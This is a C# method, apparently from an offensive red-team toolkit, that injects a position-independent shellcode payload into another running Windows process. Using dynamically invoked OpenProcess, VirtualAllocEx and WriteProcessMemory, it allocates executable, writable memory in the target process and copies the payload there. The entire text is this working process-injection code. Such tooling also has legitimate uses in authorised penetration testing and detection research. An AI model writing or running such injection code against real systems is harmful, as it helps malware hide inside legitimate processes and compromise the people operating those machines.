/// <summary> /// Allocate the payload in the target process. /// </summary> /// <param name="Payload">The PIC payload to allocate to the target process.</param> /// <param name="Process">The target process.</param> /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns> /// public IntPtr Allocate(PICPayload Payload, Process Process) { if (!IsSupportedPayloadType(Payload)) { throw new PayloadTypeNotSupported(Payload.GetType()); } // Get a convenient handle for the target process. IntPtr procHandle = DynamicInvoke.Win32.OpenProcess(Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, false, (uint)Process.Id); //create a IntPtr to return the base address of the allocated mem IntPtr alloc = DynamicInvoke.Win32.VirtualAllocEx(procHandle, IntPtr.Zero, (uint)Payload.Payload.Length, Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE, Data.Win32.WinNT.PAGE_EXECUTE_READWRITE); UIntPtr bytesWritten = UIntPtr.Zero; Boolean success = DynamicInvoke.Win32.WriteProcessMemory(procHandle, alloc, Payload.Payload, (uint)Payload.Payload.Length, out bytesWritten); if (success) { return(alloc); } else { throw new Exception("an error occured trying to write memory into the process."); } }